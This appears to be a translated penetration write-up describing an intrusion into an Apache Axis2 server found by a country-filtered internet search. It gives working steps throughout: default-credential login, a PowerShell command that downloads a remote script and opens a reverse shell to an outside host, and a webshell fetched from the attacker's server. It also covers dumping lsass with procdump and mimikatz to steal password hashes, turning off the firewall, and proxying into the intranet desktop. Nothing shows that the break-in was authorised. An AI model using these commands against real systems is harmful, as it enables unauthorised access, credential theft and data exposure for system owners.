
Title: Bypass Killer and win the target site


0x01 Target

Search: country='US' app='APACHE-Axis'. Revisiting an old hole to pick up the fish that slipped through the net; there may be unexpected harvests.


The target appears


Still a familiar page, a familiar port

Then try logging in with the default password. OK, it works.


Collect information first


Don't rush to deploy the package. First look at the existing services: a weak-password target like this has almost certainly (99.9999%) been hit by someone already.


Uploading a package of my own would be a waste if one is already there; it could simply be reused.

After a round of searching, I didn't find any leftover webshells.

So find the absolute path and upload one yourself.

C:/elocker/webapps/admin/WEB-INF/classes

A quick test showed the host has outbound Internet access, so there was no need to go through the webshell; I just brought out cs.


Execute the command

No result came back; it failed.

0x02 Reverse shell

Is the powershell command failing because it is being passed through the URL?

With that question in mind, I tried a reverse shell.


Still a failure. It is safe to conclude that there is some kind of WAF in the way.

0x03 Write the webshell

x.x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp


Check the process list

Comparing the process list reveals a security guard (AV).


0x04 Bypass the AV

Testing showed that even the most basic net user could not be executed.

There are only two roads ahead:

either build an AV-evading payload, or capture passwords. I decisively chose capturing passwords, which is simple and effective.

Mimikatz cannot be used directly.

So here I use procdump to dump the memory of the lsass process, then read the passwords out of the dump locally with mimikatz.

Upload procdump64.exe and download lsass.dmp


Then parse the file locally:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# Dump the lsass process memory to lsass.dmp

mimikatz.exe 'sekurlsa::minidump lsass.dmp' 'sekurlsa::logonPasswords full' exit
# Put lsass.dmp in the mimikatz directory before running this

Get the hash and crack the password.


0x05 Login to the server

Check the firewall status:

Netsh Advfirewall show allprofiles

Turn off the firewall:

NetSh Advfirewall set allprofiles state off

It is an intranet IP, so a proxy needs to be set up.


0x06 Log in to the cloud desktop and find an unexpected surprise

I found the owner running Telegram, heh.


0x07 Summary

1. Search for vulnerable targets with the fofa syntax country='US' app='APACHE-Axis'.
2. Found an axis2 admin backend, and the page has a weak password (admin/axis2).
3. Upload the AxisInvoker.aar package via the service upload in the backend.
4. Query the website's absolute path, which is C:/elocker/webapps/admin/WEB-INF/classes, via http://www.xxx.com/axis2/services/AxisInvoker/info
5. Try to generate a powershell backdoor with cs, triggered by visiting the following address; the access failed (an AV in the system is probably blocking it):
http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666
http://www.xxx.com/axis2/services/AxisInvoker/exec?cmd=dir%20C:
6. Write the big webshell: http://www.xxx.com/axis2/services/AxisInvoker/download?url=http://vps/data.txt&file=C:\elocker\webapps\admin\axis2-web\shell.jsp
7. Execute tasklist in the webshell and find 360tray (360 antivirus) and zhudongfangyu.exe (security guard).
8. Upload a Behinder (Ice Scorpion) webshell through the big webshell, connect, and execute net user, which errors out.
9. Upload procdump64.exe through Behinder and run the command to dump lsass: procdump64.exe -accepteula -ma lsass.exe lsass.dmp
10. Download lsass.dmp to the local machine through Behinder.
11. Load lsass.dmp in mimikatz and read out the hashes: mimikatz.exe 'sekurlsa::minidump lsass.dmp' 'sekurlsa::logonPasswords full' exit
12. Crack the NTLM hash with an md5 cracking service; the password is recovered: 123QWEqwe
13. Run the following through the webshell: Netsh Advfirewall show allprofiles (view the firewall status), then NetSh Advfirewall set allprofiles state off (turn the firewall off).
14. Turn on the proxy with the socks function built into Behinder, set up the Proxifier proxy locally and add MSTSC to the proxy.
15. Run mstsc through the proxy, log in to the intranet host remotely, and find Telegram running. Original article: https://xz.aliyun.com/t/9856
